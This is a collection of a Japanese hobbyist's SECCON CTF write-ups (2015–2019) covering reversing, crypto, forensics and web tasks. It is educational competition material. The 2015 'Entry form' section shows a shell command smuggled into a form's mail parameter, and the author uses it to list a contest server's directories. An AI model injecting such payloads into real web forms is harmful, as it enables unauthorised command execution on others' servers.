CTF on きょうのかんぱぱ

SECCON 令和CTFのWrite-upをまとめました

Tue, 30 Apr 2019 00:00:00 +0000

SECCON 令和CTFに参加しました。

今回は２時間という短期決戦です。今回も回答できた人の人数でどんどん点数が低くなるということで、なかなか厳しかったです。途中で1時間延長されましたが・・・。

解いた問題は２つで、合計で110点獲得できました。

フラグの例は　10点
bREInWAck　100点

あと、時間はすぎてしまいましたが、以下の１問も解きました。

零は？　100点（でも時間外なので0点）

忘れないうちにWrite-upを書いておきました。

フラグの例は (Misc)

いつものサービス問題です。

bREInWAck (Misc)

flag.bwというファイルが提供されました。バイナリエディタでみたところ

令和とか平成という文字が並んでいます。

とりあえずテキスト形式のようなのでcatで確認です。

参考サイトとして、以下のサイトが挙げられていました。

https://ja.wikipedia.org/wiki/Brainfuck

面白いプログラム例です。ここででてくる８つの言語仕様が、それぞれの漢字１文字に対応づけられているのでしょう。

見たところ以下の３つは想像がつきます。

「　→　[

」　→　]

。　→　.

残りは、次のように考えました。

傾向として「和」がたくさんでてきます。多分これはポインタが指す値をインクリメントするのだろうと、「＋」としました。

また最初に「令」がきているのでこれはポインタ操作かなと、いきなり減算はしないだろうから、「＞」と考えました。

残るは、「平」、「成」ですが、まあ、「－」と「＜」のどちらかなので２通り置換したものを作りました。

このルールに従ってエディタで置換したものが以下のようになります。

>++++++++++++++++[>+++++>++++>+++++++>++++++>++<<<<<-]>+++.>+++++.--..<----.-.>>+++++++++++.>++.<<<++++.>++.++++.>>++++++++++++.<<<+++++++++++++.--------.>--------.>>.-----.------.>+.<<++.>>>++++++++++.

これをWikiPediaにリンクされていたBrainCrashのJavaScriptに流してみましたが、うまく表示されません。ここでいろんなパターンを試していて時間が過ぎていきました。

良く説明を読んだらこのJavaScriptでは初期値にHello Worldが設定されているとのことで、これが邪魔をしているのかなと、一度ローカルにコピーして、JavaScriptのHello Worldの文字列の値をすべて0に変更して流し込んだところ、無事フラグがでてきました。

零は？ (Misc)

問題にはサーバ名とポート番号が書かれていました。早速接続してみると

[1/100]
0=?-34
?=34
[2/100]
0=92+?-184
?=
Wrong!
(Enter RETURN key if connection is not disconnected)

という感じで、表示された式の結果を０にする値を回答するもののようです。

これは以前Z80の逆アセンブラ問題 (Let’s disassemble)で苦労したパターンだなと思いだしました。

入出力の部分は前回のZ80問題のソースを持ってきて作りだしましたが、方程式の解法ってpythonでどうやるんだろうと調べている間に、タイムリミットになってしまいました。

その後、SymPyという便利なものがあることを知り早速組み込みました。

何度かプログラムを修正して、フラグを取得できました。

いつものように汚いプログラムですが、githubに載せておきます。

総評

今回は実質１問ということで残念な結果に終わりましたが、時間切れになってしまっても最後まで取り組んでなんとか解けたのが良かったです。

関係者の皆様ありがとうございました。

また次回もよろしくお願いします。

SECCON 2018 Online CTF のWrite-upをまとめました

Sun, 28 Oct 2018 00:00:00 +0000

SECCON 2018 オンラインCTFに参加しました。

去年のCTF と同様一人でのんびり取り組んだのですが、今回は回答できた人の人数でどんどん点数が低くなるということで、一人チームでは厳しい状況でした。

解いた問題は２つで、合計で371点獲得できました。

Unzip 101点 597人が回答
Special Instructions　270点　61人が回答

忘れないうちにWrite-upを書いておきました。

Unzip (Forensics)

unzip.zipというファイルが提供されました。Unzip flag.zip.とのことです。

普通にzipを解いてみたところ、flag.zipとmakefile.sh がでてきました。

次のflag.zip を展開しようとしたところパスワードがかかっています。

makefile.shをみてみると、どうもこのzipファイルのパスワードはファイルを作成した日時のUNIXTIMEが該当するようです。

ファイルの作成日付は、2018年10月27日 0:10:42とのことなので、

$ date +%s --date "2018-10-27 00:10:42"
1540566642

この数字の前後の値を試してみるとパスワードが一致しました。

Special Instructions (Reversing)

問題ではrunmeというファイルが添付されていました。

このファイルを実行するとフラグがでてくるようです。

また、「大熱血！アセンブラ入門」で使用しているクロスコンパイル環境がヒントのようです。

まずはこのファイルが何なのか調べます。

$ file runme_f3abe874e1d795ffb6a3eed7898ddcbcd929b7be
runme_f3abe874e1d795ffb6a3eed7898ddcbcd929b7be: ELF 32-bit MSB executable,*unknown arch 0xdf* version 1 (SYSV), statically linked, not stripped

ELFのようですが、アーキテクチャが0xdfで普通のCPUではなさそうです。

次にreadelfで見てみます。

$ readelf runme_f3abe874e1d795ffb6a3eed7898ddcbcd929b7be
ELF Header:
Magic: 7f 45 4c 46 01 02 01 00 00 00 00 00 00 00 00 00
Class: ELF32
Data: 2's complement, big endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: EXEC (Executable file)
Machine: Moxie
Version: 0x1
Entry point address: 0x1400
Start of program headers: 52 (bytes into file)
Start of section headers: 1936 (bytes into file)
Flags: 0x0
Size of this header: 52 (bytes)
Size of program headers: 32 (bytes)
Number of program headers: 3
Size of section headers: 40 (bytes)
Number of section headers: 9
Section header string table index: 8

これを見る限りMoxie 仮想CPUのELFファイルのようです。

他にヒントがないかなとバイナリダンプをしてみます。

moxie-elf.c という文字が見えます。やはりmoxie CPUのバイナリのようです。

また、バイナリダンプには他にも気になる文字列があったので、stringsしてみると。

$ strings runme_f3abe874e1d795ffb6a3eed7898ddcbcd929b7be
,.U7
0123456789abcdef
This program uses special instructions.
SETRSEED: (Opcode:0x16)
RegA -> SEED
GETRAND: (Opcode:0x17)
xorshift32(SEED) -> SEED
SEED -> RegA
GCC: (GNU) 4.9.4
moxie-elf.c
decode
putchar

どうやら特別なCPU命令が含まれたELFバイナリのようです。この命令を仮想CPUに実装しないと動かないのだと思います。

これは間違いなく「大熱血！アセンブラ入門」の実行環境のビルドが必要になるということで、急いでWSLのUbuntuにビルド環境を構築しました。

$ wget -nd http://kozos.jp/books/asm/cross-gcc494-v1.0.zip

コンパイルに時間がかかるので、moxieのアーキテクチャだけコンパイルするようにしました。付属のREADME.txtにそのあたりも書かれていましたので助かりました。

moxieの実行環境でこのバイナリを動かしてみたところ、

$ /usr/local/cross-gcc494/bin/moxie-elf-run ~/runme_f3abe874e1d795ffb6a3eed7898ddcbcd929b7be
program stopped with signal 4 (Illegal instruction).
$

やはり、未定義命令があるので、途中で停止してしまいました。

普通に考えると実行環境で使っているCPUシミュレータに新しい命令を追加すればよいはずです。

ソースをさがしてみたところ、該当する部分が見つかりましたので、新しい命令を追加します。

今回組み込んだxorshift32の計算方法はWikipediaを参考にしました。

~/cross-gcc494/toolchain/gdb-7.12.1/sim/moxie$ diff -rc interp.c.org interp.c
*** interp.c.org 2018-10-28 11:15:52.420937700 +0900
--- interp.c 2018-10-28 14:39:13.465745600 +0900
***************
*** 246,251 ****
--- 246,252 ----
int siggnal) /* ignore */
{
word pc, opc;
+ unsigned int seed; /* seed */
unsigned short inst;
sim_cpu *scpu = STATE_CPU (sd, 0); /* FIXME */
address_word cia = CPU_PC_GET (scpu);
***************
*** 660,667 ****
cpu.asregs.regs[a] = r >> 32;
}
break;
! case 0x16: /* bad */
! case 0x17: /* bad */
case 0x18: /* bad */
{
opc = opcode;
--- 661,691 ----
cpu.asregs.regs[a] = r >> 32;
}
break;
! case 0x16: /* setrseed */
! {
! int a = (inst >> 4) & 0xf;
! unsigned int av = cpu.asregs.regs[a];
! seed = av;
!
! printf("a = %08x, av = %08x, seed = %08x\n",a,av,seed);
! MOXIE_TRACE_INSN ("setrseed");
! }
! break;
! case 0x17: /* getrand */
! {
! int a = (inst >> 4) & 0xf;
! printf("a = %08x, seed = %08x, ",a,seed);
!
! /* xorshift32 */
! seed ^= seed << 13;
! seed ^= seed >> 17;
! seed ^= seed << 15;
!
! printf("newseed = %08x\n",seed);
! MOXIE_TRACE_INSN ("getrand");
! cpu.asregs.regs[a] = seed;
! }
! break;
case 0x18: /* bad */
{
opc = opcode;
~/cross-gcc494/toolchain/gdb-7.12.1/sim/moxie$

修正したソースを使ってビルドしたmoxie仮想CPUシミュレータで実行してみると、

~/cross-gcc494/build/gdb/moxie-elf/sim/moxie$ ./run ~/runme_f3abe874e1d795ffb6a3eed7898ddcbcd929b7be
a = 00000002, av = 92d68ca2, seed = 92d68ca2
This program uses special instructions.
SETRSEED: (Opcode:0x16)
RegA -> SEED
GETRAND: (Opcode:0x17)
xorshift32(SEED) -> SEED
SEED -> RegA
a = 00000002, seed = 92d68ca2, newseed = 35c36d03
a = 00000002, seed = 35c36d03, newseed = c8fa2132
:
:
a = 00000002, seed = f63e5c0a, newseed = bcd582d5
a = 00000002, seed = bcd582d5, newseed = 9ec62492
SECCON{MakeSpecialInstructions}
~/cross-gcc494/build/gdb/moxie-elf/sim/moxie$

無事フラグがでてきました。

総評

今回は２問ということでたいしたことはできませんでしたが、大好きな「大熱血！アセンブラ入門」本に関係する問題がでたので、これだけは必ず解くぞという感じで取り組んでみました。仮想CPUに触れるよい機会になりましたし、久しぶりに大規模なビルドをすることもできました。

関係者の皆様ありがとうございました。

また次回もよろしくお願いします。

SECCON 2017 Online CTF のWrite-upをまとめました

Sun, 10 Dec 2017 00:00:00 +0000

SECCON 2017 オンラインCTFに参加しました。

去年のCTFと同様一人チームでのんびり取り組みましたが、今回はなんと300点問題が解けました！

解いた問題は５つで、合計で700点獲得できました。

Run me! (Programming) 100点 826人が回答
putchar music (Programming) 100点 429人が回答
SHA-1 is dead (Crypto) 100点 453人が回答
z80 (Binary) 300点 18人が回答
Thank you for playing! (Thank you!) 100点 830人が回答

忘れないうちにWrite-upを書いておきました。

Run me!(Programming) 100点

問題のpythonプログラムをみると、かなり深い再帰を行うプログラムのようです。このまま実行しても終わりません。

まずはプログラムの動きを確認するために最初の呼び出し元であるf(11010)の引数を変えて実行してみたところ、以下のような値になりました。

これを関数に置き換えてみると、以下のような展開になります。

f(0) = 0
f(1) = 1
f(2) = f(2-2) + f(2-1) = f(0) + f(1) = 0 + 1 = 1
f(3) = f(3-2) + f(3-1) = f(1) + f(2) = 1 + 1 = 2
f(4) = f(4-2) + f(4-1) = f(2) + f(3) = 1 + 2 = 3
f(5) = f(5-2) + f(5-1) = f(3) + f(4) = 2 + 3 = 5

ということは、ループにしてf(n)の値を配列に保存して、その値を順次使って計算すれば良さそうです。

pythonで作成したプログラムは以下のようになりました。

$ cat RunMe3.py 
f = [0, 1, 1]
n = 3

while True:
 f.append(f[n-2] + f[n-1])
 n += 1
 if n >= 11012:
 break

print "SECCON{" + str(f[11011])[:32] + "}"
$ python RunMe3.py
SECCON{65076140832331717667772761541872}

putchar music(Programming) 100点

まずは問題のプログラムをコンパイルしました。標準出力にデータがでてくるようなので、ファイルに出力しましたがかなり巨大だったので途中で中断しました。生成されたファイルは単なるデータのようです。

$ ls -l output.bin
-rw-rw-r-- 1 ocha ocha 2322149376 Dec 9 23:36 output.bin
$ file output.bin
output.bin: data
$

これをバイナリダンプしてみたところ、各データの数値の前後の値がそれほど変化しておらず、なにやら連続的なアナログな数値に見えました。

$ hexdump output.bin | more 
0000000 0805 0e0b 1310 1916 1f1c 2421 2a27 302d
0000010 3532 3b38 413e 4643 4c49 524f 5754 5d5b
0000020 6361 6965 6f6b 7371 7977 7f7d 8583 8b87
0000030 918d 9593 9b99 a19f a7a5 ada9 b3af b7b7
0000040 bfba c3c2 cac7 cecb d6d3 dbd6 dfde e7e2
0000050 eae7 f2ef f6f3 fbfa 03fe 0706 0e0b 130f
0000060 1b17 1f1b 2323 2b27 2f2b 3733 3b37 3f3f
0000070 4743 4b4b 534f 5753 5b5b 635f 6767 6c6e
0000080 766f 7c75 7d7f 8784 8d86 8e8f 9495 9e97
0000090 9f9c a5a6 afac b4ad b6b7 bcbd c5be c7c5
00000a0 cdcf d7cf ddd5 dfdf e7e5 ede7 efed f5f5
00000b0 fff7 fffd 0507 0f0d 150f 1717 1d1d 271f
00000c0 2726 2f2e 3636 3e37 3e3f 4746 4f46 4f4e
00000d0 5657 5e57 665f 6766 6f6e 776e 7677 7f7f
00000e0 877f 8787 8f8f 9797 9f97 9f9f a7a7 afa7
00000f0 afaf b7b7 bfb7 c7bf c7c7 cfcf d7cf dedc
0000100 dcd9 eadf efed edea fbf8 f8fe fefb 0c09
0000110 090e 0f0c 1d1a 1a1f 281d 2e2b 2b28 392f
0000120 3f3d 3d39 4b3f 494d 4d4b 5b59 595f 5f5b
0000130 6d69 696f 6f6d 7d7b 7b79 897d 8f8b 8b8b
0000140 9b8e 9f9e 9e9a aa9f aaaf afab bbba bbbe
0000150 bebe cecb cacf cfce dfda dbda eadf efeb
0000160 efeb fbef ffff fffb 0bff 0b0f 0f0b 1b1b
　　　　:

もしやと思い、このデータをaplayに流し込んでみたら・・・・。

$ aplay output.bin Playing raw data 'output.bin' : Unsigned 8 bit, Rate 8000 Hz, Mono

有名な映画音楽が流れてきました。

この問題は５分もかからなかったかもしれません。

SHA-1 is dead(Crypto) 100点

これは以下の条件のファイルを作れという問題です。

file1 != file2
SHA1(file1) == SHA1(file2)
SHA256(file1) <> SHA256(file2)
2017KiB < sizeof(file1) < 2018KiB
2017KiB < sizeof(file2) < 2018KiB
* 1KiB = 1024 bytes

SHA-1が破られたということで話題になりました。まずはその記事を確認です。

https://shattered.it

ここに載っている2つのPDFがSHA-1が同じだけど、中身が違うサンプルファイルです。

でもこのファイルは大きさが小さいです。どうしようかなと思っていたところで、次のスライドを見つけました。

https://www.slideshare.net/herumi/googlesha1

なんと、違っているのは前半の一部分ということなので、先ほどのPDFファイルに適当なデータをくっつけてサイズを合わせれば良いことになります。

$ cat sha2.c
#include 
int main(){
 char a;
 for (int i = 1; i < 2018*1024-1 ; i++){
 putchar(getchar());
 }
}
$ ./sha2 < shattered-1.pdf > a1.pdf
$ ./sha2 < shattered-2.pdf > a2.pdf
$ ls -l a?.pdf
-rw-rw-r-- 1 ocha ocha 2066430 Dec 10 08:27 a1.pdf
-rw-rw-r-- 1 ocha ocha 2066430 Dec 10 08:28 a2.pdf
$
$ cmp -b a1.pdf a2.pdf
a1.pdf a2.pdf differ: byte 193, line 8 is 163 s 177 ^?
$ cat a1.pdf | openssl sha1(stdin)= b4e859a1c9d68d2dae07b02e3d8a1bbb77fe5bff
$ cat a2.pdf | openssl sha1(stdin)= b4e859a1c9d68d2dae07b02e3d8a1bbb77fe5bff
$ cat a1.pdf | openssl sha256(stdin)= d8109bf9bc8dc0960b8650b4ac96223fab268a47b40d32a295dd8121dc142752
$ cat a2.pdf | openssl sha256(stdin)= 86021f60a9a82dc1e617b2157fdf63fe04d1c83d7a19dbc29f2fa4c4b4f17b8b

できたファイルをアップロードしてフラグが取れました。

z80(Binary) 300点

これはz80ファンとしては解かねばいうことで時間をかけて取り組みました。

JPEGの写真がたくさん入っていて、Z-80 CPUとArduino Megaが接続されたハードウェアが360度の方向から写っていました。Z-80の周辺デバイスとしてArduino Megaを使うもののようです。

この問題のハードウェアの写真をまとめてビデオにしてみました。

※SECCON様から掲載許可をいただきました。ありがとうございます。

Arduinoのソースをみると、実行コードらしい16進数が組み込まれていましたが、どうもZ80ぽくない数値です。

static unsigned char mem[memsize] = {
 0x22, 0x47, 0x00, 0x3d, 0x53, 0x77, 0x23, 0x3d, 0x45, 0x77, 0x23, 0x3d, 0x43,
 0x77, 0x23, 0x77, 0x23, 0xc5, 0x0c, 0x77, 0x23, 0xc5, 0xfd, 0x77, 0x23, 0x3d,
 0x7b, 0x77, 0x23, 0x39, 0x44, 0x00, 0x47, 0xc5, 0x46, 0x31, 0x44, 0x00, 0x78,
 0x31, 0x46, 0x00, 0xfd, 0x22, 0xf9, 0x1e, 0x00, 0xfd, 0x7b, 0xf1, 0x1e, 0x00,
 0x77, 0x23, 0x39, 0x45, 0x00, 0x3e, 0x31, 0x45, 0x00, 0xc1, 0x1e, 0x00, 0x3d,
 0x7d, 0x77, 0x75, 0x03, 0x0b, 0x09, };

多分、データバスもしくはアドレスバスの接続がわざと変えてあるのだろうと推測し、たくさんある写真を見比べたところ、データバスのD0とD1が逆に接続されているように見えました。そこで、Arduinoのソースにある16進数の下位2ビットを入れ替えてみると、見慣れたZ80の機械語がでてきました。21 xx xxとか 3E xx は一番多く使うものだと思います。

変換プログラムを作ってもよかったのですが、コードが短いので手で置き換えてZ80アセンブラのソースコードを作りました。

0000 0x22, 0x47, 0x00 21 47 00 LD HL,0x0047
0003 0x3d, 0x53 3E 53 LD A,'S' 
0005 0x77 77 LD (HL),A 
0006 0x23, 23 INC HL 
0007 0x3d, 0x45 3E 45 LD A,'E' 
0009 0x77 77 LD (HL),A 
000a 0x23 23 INC HL 
000b 0x3d, 0x43, 3E 43 LD A,'C' 
000d 0x77 77 LD (HL),A 
000e 0x23 23 INC HL 
000f 0x77 77 LD (HL),A 
0010 0x23, 23 INC HL 
0011 0xc5, 0x0c C6 0C ADD A,0x0c 0x43+0xc = 0x4f = 'O' 
0013 0x77 77 LD (HL),A 
0014 0x23 23 INC HL 
0015 0xc5, 0xfd C6 FE ADD A,0xfe 0x4f+0xfe = 0x14d = 4d = 下位2ビット入替 = 4E = 'N' 
0017 0x77 77 LD (HL),A 
0018 0x23, 23 INC HL 
0019 0x3d, 0x7b 3E 7B LD A,'{' 
001b 0x77 　 77 LD (HL),A 
001c 0x23 23 INC HL 
001d 0x39, 0x44, 0x00 3A 44 00 LOOP1: LD A,(0x0044) A <= 0x03 
0020 0x47, 47 LD B,A B <= 0x03 
0021 0xc5, 0x46 C6 45 ADD A,0x45 A <= 0x45 + 0x03 
0023 0x31, 0x44, 0x00 32 44 00 LD (0x0044),A 
0026 0x78, 78 LD A,B 
0027 0x31, 0x46, 0x00, 32 45 00 LD (0x0045),A 
002a 0xfd, 0x22, FE 21 CP 0x21 
002c 0xf9, 0x1e, 0x00, FA 1D 00 JP M,LOOP1 
002f 0xfd, 0x7b FE 7B CP 0x7B 
0031 0xf1, 0x1e, 0x00 F2 1D 00 JP P,LOOP1 
0034 0x77 77 LD (HL),A 
0035 0x23 23 INC HL 
0036 0x39, 0x45, 0x00, 3A 46 00 LD A,(0x0046) 
0039 0x3e, 3D DEC A 
003a 0x31, 0x45, 0x00, 32 46 00 LD (0x0046),A 
003d 0xc1, 0x1e, 0x00, C2 1D 00 JP NZ,LOOP1 
0040 0x3d, 0x7d 3E 7E LD A,0x7e 　　　 下位2ビット入替で7E -> 7D = '}' 
0042 0x77 77 LD (HL),A 
0043 0x75, 76 HALT 停止（さすが！） 
0044 0x03 03 DB 0x03 
0045 0x0b 0B DB 0x0b 
0046 0x09, 0A DB 0x0a

ソースコードの最初を見てみると、フラグの頭文字の"SECCON{“をメモリに書き込んでいることがわかります。書き込むときも下位２ビットを入れ替えることになります。肝心なフラグの部分は条件判断やループを使っていたので、その部分だけ簡単なプログラムを作りフラグを求めました。

$ cat z80.c
#include 
int main(){
 char x0044 = 0x03; // 00000011
 char x0045 = 0x0b; // 00001011
 char x0046 = 0x0a; // 00001001 => 00001010
 char a;
 char b;
 int hl = 0;
 loop1:
 a = x0044;
 b = a;
 a = a + 0x45;
 x0044 = a;
 a = b;
 x0045 = a;
 if (a < 0x21) goto loop1;
 if (a >= 0x7b) goto loop1;
 printf("0x%02x - %c\n",a,a);
 hl = hl + 1;
 a = x0046;
 a = a - 1;
 x0046 = a;
 if (a != 0) goto loop1;
}
$ ./a.out
0x48 - H
0x5c - \
0x2b - +
0x70 - p
0x3f - ?
0x53 - S
0x22 - " →下位2ビットを入れ替えて 0x21 !
0x67 - g
0x36 - 6 →下位2ビットを入れ替えて 0x35 5
0x4a - J →下位2ビットを入れ替えて 0x49 I
$

これでフラグがとれました。ちなみに下位ビットの入れ替えはmacOSの標準アプリの「計算機」で確認しながら行いました。

この問題はデータバスの２本だけが入れ替わっていたのが救いでした。アドレスバスも入れ替わっていたら追いきれませんので。

Thank you for playing!(Thank you!) 100点

z80が終わって一息ついて次は何をやろうかなと思っていたら一番最後にこのボーナス問題がありました。フラグをそのまま入力して100点取りました。

総評

今回は初めて100点以外の問題が解けました。Z80＋Arduinoという楽しい問題をありがとうございました。また終盤に公開されたボーナス問題もありがたかったです。また来年もできる範囲で参加したいと思います。運営の皆様ありがとうございました。

SECCON 2016 Online CTFのWrite-upをまとめました

Sun, 11 Dec 2016 00:00:00 +0000

SECCON 2016 オンラインCTFに参加しました。
前回同様一人チームでのんびり取り組みましたが、今回は前回までとは違って難易度がかなり高くなったと感じました。誰でも解ける練習用問題もありませんでしたし・・・。
結局解いた問題は２つだけです。合計で200点獲得できました。

Vigenere (Crypto) 100点 777人が回答済
VoIP (Forensics) 100点 733人が回答済

忘れないうちにWrite-upを書いておきました。

Vigenere (Crypto) 100点

Vigenereとはヴィジュネル暗号のことで、暗号表と鍵を組み合わせて使う暗号のようです。
このような古典的な暗号の場合は、解読ツールがいろいろあるので探してみましたが、今回のSECCON問題ではフラグに含まれる{}が暗号表に含まれているのでそのままでは使えませんでした。

ただ問題の中に鍵の長さは12文字であること、途中まで平文と暗号文が対応していたので、その部分と暗号表を照らし合わせて鍵の頭の文字はVIGENERであることがわかりました。あと５文字の鍵を見つけなければなりません。この場合はプログラムを書いて総当たりでキーを作って試していくしかありません。フラグのMD5ハッシュ値がありますので、作成した平文をこのハッシュ値と付き合わせればいいでしょう。

結局慣れているCでプログラムを書きました。急いで作ったので汚いプログラムですが、ソースファイルはgithubに入れておきました。コンパイルはcc v.c -lcryptoで行なってください。

このプログラムを動かして、無事フラグを取ることができました。

VoIP (Forensics) 100点

これはpcapが添付されていましたので、WireSharkで読み込みました。VoIPなのでツールバーの「VoIP通話」を選ぶと、ストリームを再生することができました。

聞き取りにくい声ですが、フラグを教えてくれているようです。SECCON{9001???}と聞き取れたのですが、数字の後の３文字がなかなか聞き取れません。これかなと思ったアルファベットを組み合わせて入力しても回答が一致しません。この手の問題であればランダムな英字３文字をフラグにするというのは無いように思います。意味のある英字３文字・・・あ、そういえばこの音声って自動音声応答装置だよなぁ・・「IVR」だ！　ということで無事フラグが取れました。こういう発想もSECCONには必要なんですよね。

総評

今回が４回目のSECCON CTFですが、合計200点ということで残念な結果となりました。
他の問題も手をつけてみたもののなかなか先にすすめず、やはりチームでないと厳しいですね。
まあ、SECCONは国際大会なのでレベルが高くなるのはやむを得ませんが・・。
他の参加者の皆様のWrite-Upを参考にして次回に備えたいと思います。
運営の皆様もお疲れさまでした。

SECCON 2015 Online CTFのWrite-upをまとめました

Sun, 06 Dec 2015 00:00:00 +0000

SECCON 2015 オンラインCTFに参加しました。

解いた問題は以下の７つの問題です。合計で600点獲得できました。

Start SECCON CTF (Exercises) 50点
Unzip the file (Crypto) 100点
Connect the server (Web/Network) 100点
Command-Line Quiz (Unknown) 100点
Entry form (Web/Network) 100点
Steganography 1 (Stegano) 100点
Last Challenge (Thank you for playing) (Exercises) 50点

忘れないうちにWrite-upを書いておきました。

Start SECCON CTF (Exercises) 50点

これは練習用の問題です。暗号表がありますので１文字づつ比較して復号しました。

Unzip the file (Crypto) 100点

問題にunzipというファイルが添付されています。ダウンロードしてfileで確認したところZIPファイルのようです。拡張子を.zipにして、unzipすると暗号化されていました。中身のファイル名だけはわかります。

$ unzip unzip.zip
Archive: unzip.zip
[unzip.zip] backnumber08.txt password: (わからないのでエンターキーで）
skipping: backnumber08.txt incorrect password
skipping: backnumber09.txt incorrect password
skipping: flag incorrect password
$

いろいろ調べたところ、ZIPに含まれている暗号化されていないPlainTextがあれば解読できるpkcrackというツールがあるようです。取り急ぎdebianにインストールしました。

$ cd pkcrack-1.2.2/
$ cd src
$ make

でも問題にはbacknumber08.txtやbacknumber09.txtは含まれていません。ファイル名でWeb検索したところ、SECCONのメールマガジンのバックナンバーが同じファイル名でした。これをダウンロードして、さらにzipしたものも作成します。

$ zip backnumber08.zip backnumber08.txt
$ zip backnumber09.zip backnumber09.txt
$ ./pkcrack -C ./unzip.zip -c backnumber09.txt -p backnumber09.txt -P backnumber09.zip -d xxxx.zip
Files read. Starting stage 1 on Sun Dec 6 13:56:16 2015
Generating 1st generation of possible key2_4850 values...done.
Found 4194304 possible key2-values.
Now we're trying to reduce these...
Done. Left with 3342 possible Values. bestOffset is 24.
Stage 1 completed. Starting stage 2 on Sun Dec 6 13:56:27 2015
Ta-daaaaa! key0=270293cd, key1=b1496a17, key2=8fd0945a
Probabilistic test succeeded for 4831 bytes.
Ta-daaaaa! key0=270293cd, key1=b1496a17, key2=8fd0945a
Probabilistic test succeeded for 4831 bytes.
Ta-daaaaa! key0=270293cd, key1=b1496a17, key2=8fd0945a
Probabilistic test succeeded for 4831 bytes.
Ta-daaaaa! key0=270293cd, key1=b1496a17, key2=8fd0945a
Probabilistic test succeeded for 4831 bytes.
Ta-daaaaa! key0=270293cd, key1=b1496a17, key2=8fd0945a
Probabilistic test succeeded for 4831 bytes.
Ta-daaaaa! key0=270293cd, key1=b1496a17, key2=8fd0945a
Probabilistic test succeeded for 4831 bytes.
Stage 2 completed. Starting zipdecrypt on Sun Dec 6 13:58:07 2015
Decrypting backnumber08.txt (5315a01322ab296c211eecba)... OK!
Decrypting backnumber09.txt (83e6640cbec32aeaf10ed1ba)... OK!
Decrypting flag (34e4d2ab7fe1e2421808bab2)... OK!
Finished on Sun Dec 6 13:58:07 2015
$

これでパスワードが外れたZIPファイルができました。

$ unzip xxxx.zip

早速unzipして、無事zipファイルを解凍することができました。生成されたflagsファイルをみると、またZIPファイルでしたのでこれも解凍したところ、XMLファイルがたくさんできました。ディレクトリやファイルの内容から見てWORDのファイルのようです。 flagsの拡張子を.docxにしてWindowsPCで開いたところ、白い文字でflagが書かれていました。

Connect the server (Web/Network) 100点

サーバー名:10000　というヒントのみ。とりあえず、サーバーにポート番号10000で接続してみました。

$ telnet xxxxx.xxx.seccon.jp 10000
Trying xxx.xxx.xxx.xxx...
Connected to xxxx.xxx.seccon.jp.
Escape character is '^]'.
CONNECT 300
Welcome to SECCON server.
The server is connected via slow dial-up connection.
Please be patient, and do not brute-force.
login:
Login timer timed out.
Thank you for your cooperation.
HINT: It is already in your hands.
Good bye.
Connection closed by foreign host.
$

文字がゆっくり表示されます。CONNECT 300はアナログモデムをイメージしているのでしょう。問題のジャンルとしてはWeb/Networkなので、ネットワークに流れているデータも見てみると、これ以外のものが流れているようにみえました。試しに、Webブラウザでもアクセスしたところ・・・。何かフラグのようなデータが流れています。１文字表示して、１文字消してを繰り返しているので画面で見えなかったのです。この文字を拾うとフラグがでてきました。

Command-Line Quiz (Unknown) 100点

これはただひたすら知っているUNIXコマンドを答えていくものです。

CaitSith login: root
Password:
$ cat stage1.txt
What command do you use when you want to read only top lines of a text file?
Set your answer to environment variable named stage1 and execute a shell.
$ stage1=$your_answer_here sh
If your answer is what I meant, you will be able to access stage2.txt file.
$ stage1=head sh
$ cat stage2.txt
What command do you use when you want to read only bottom lines of a text file?
Set your answer to environment variable named stage2 and execute a shell.
$ stage2=$your_answer_here sh
If your answer is what I meant, you will be able to access stage3.txt file.
$ stage2=tail sh
$ cat stage3.txt
What command do you use when you want to pick up lines that match specific patterns?
Set your answer to environment variable named stage3 and execute a shell.
$ stage3=$your_answer_here sh
If your answer is what I meant, you will be able to access stage4.txt file.
$ stage3=grep sh
$ cat stage4.txt
What command do you use when you want to process a text file?
Set your answer to environment variable named stage4 and execute a shell.
$ stage4=$your_answer_here sh
If your answer is what I meant, you will be able to access stage5.txt file.
$ stage4=cat sh
：（思考錯誤の繰り返し）
：
$ stage4=sed sh
$ cat stage5.txt
cat: can't open 'stage5.txt': Operation not permitted
$ stage4=awk sh
$ cat stage5.txt
OK. You reached the final stage. The flag word is in flags.txt file.
flags.txt can be read by only one specific program which is available
in this server. The program for reading flags.txt is one of commands
you can use for processing a text file. Please find it. Good luck. ;-)
$ awk '{print $0}' flags.txt
awk: flags.txt: Operation not permitted
$ join flags.txt
sh: join: not found
$ uniq flags.txt
uniq: can't open 'flags.txt': Operation not permitted
$ sed 's/s//' flags.txt
OK. You have read all .txt file. The flag word is shown below.
SECCON{CaitSith@AQUA}
$

この問題はこれで良かったのでしょうか・・？

Entry form (Web/Network) 100点

あるCGIを叩くとフォームがでます。どうもインジェクションの問題のようです。直接GETパラメタにいろんな値を設定してもエラーらしきものは出ません。エラーチェックしていないのかそれともわざと何も出していないのか。試しに、cgiのパスを指定しないでアクセスすると、あっ・・・丸見えでございます。CGIのバックアップと思われる.bakファイルがあるのでこれをクリックするとcgiのソースが見えました。

　：
if($q->param("mail") ne '' && $q->param("name") ne '') {
open(SH, "|/usr/sbin/sendmail -bm '" . $q->param("mail") . "'" );
print SH "From: xxxx.xxxxx\@seccon.jp\nTo: ".$q->param("mail")."\nSubject: from SECCON Entry Form\n\nWe received your entry.\n";
close(SH);
open(LOG, ">>log"); ### param("mail")."\t".$q->param("name")."\n";
close(LOG);
：

本番もこれに近いものだろうと思われます。logファイルにflagがあるというヒントもありますね。こういう書き方ですから、こうやればいいのでしょうか？

http://entryform.pwn.seccon.jp/register.cgi?name=d&action=Send&mail=%27+|+ls+-alR+%23

ビンゴでございます。ディレクトリの内容が表示できました。

.:
total 2016
dr-xr-xr-x 3 cgi cgi 4096 Dec 1 22:29 .
drwxr-xr-x 4 root root 4096 Dec 1 22:57 ..
-r--r--r-- 1 root root 221 Dec 5 15:18 .htaccess
dr-xr-xr-x 2 root root 4096 Dec 1 21:52 SECRETS
-r---w---- 1 apache cgi 2028064 Dec 5 23:33 log
-r--r--r-- 1 root root 1132 May 15 2015 logo.png
-r-xr-xr-x 1 cgi cgi 1631 Dec 5 20:32 register.cgi
-r--r--r-- 1 root root 1583 Dec 1 22:25 register.cgi_bak
./SECRETS:
total 16
dr-xr-xr-x 2 root root 4096 Dec 1 21:52 .
dr-xr-xr-x 3 cgi cgi 4096 Dec 1 22:29 ..
-r--r--r-- 1 root root 42 Dec 1 21:52 backdoor123.php
-r--r--r-- 1 root root 19 Dec 1 21:52 index.html

.htaccessも見ちゃいます。

